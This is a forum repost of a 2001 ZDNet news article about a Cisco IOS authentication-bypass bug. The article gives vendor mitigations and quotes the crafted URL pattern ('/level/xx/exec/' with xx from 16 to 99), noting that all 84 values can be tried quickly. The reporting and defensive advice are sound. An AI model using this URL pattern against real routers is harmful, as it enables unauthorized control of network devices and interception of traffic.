Cisco Router Bug Threatens Net Security

greenspun.com : LUSENET : Grassroots Information Coordination Center (GICC) : One Thread

Cisco Router Bug Threatens Net Security

By Matthew Broersma, ZDNet (UK) June 29, 2001 1:35 PM ET

Cisco Systems and CERT, the security advisory organization, have warned of a bug in Cisco routers and switches. The glitch could give a hacker the ability to disrupt Internet traffic or intercept sensitive information.

The bug, revealed on Thursday, allows a malicious user to gain control of any Cisco router running IOS software. The bug affects all releases of the software, which controls most of Cisco's products, beginning with version 11.3. The bug affects "virtually all" mainstream Cisco routers and switches running IOS.

The vulnerability requires little skill to exploit: A malicious user can simply send a crafted URL and commands will be executed on the router or switch.

The bug allows an attacker to take control of routers at the highest level--level 15--without authorization. Routers are devices that control how data moves around the Internet; with such unauthorized control, hackers can stop Internet traffic, intercept information such as passwords and credit card numbers, or redirect traffic bound for one Web site to another.

Cisco said that when an HTTP server is enabled and users are authorized from a local database, it is possible for a hacker to bypass authentication and exercise complete control over the router.

The company is recommending that HTTP servers on routers be disabled. The problem can also be sidestepped by using Terminal Access Controller Access Control System (TACACS+) or Radius systems for authentication instead of a local database.

According to Cisco, the crafted URL used to exploit the bug takes the form: http:///level/xx/exec/.... Where xx is a number between 16 and 99.

The same URL will not be effective on every device, depending on the combination of hardware and software releases. But since there are only 84 combinations to try, they could all be tested in a short space of time, Cisco said.

Cisco said it has not had any reports of the bug being exploited. It was originally reported by independent users.

The company said it is providing a software upgrade to fix the problem, which will be available on its Web site .

http://www.zdnet.com/intweek/stories/news/0,4164,2781357,00.html

-- Martin Thompson (mthom1927@aol.com), June 29, 2001


Moderation questions? read the FAQ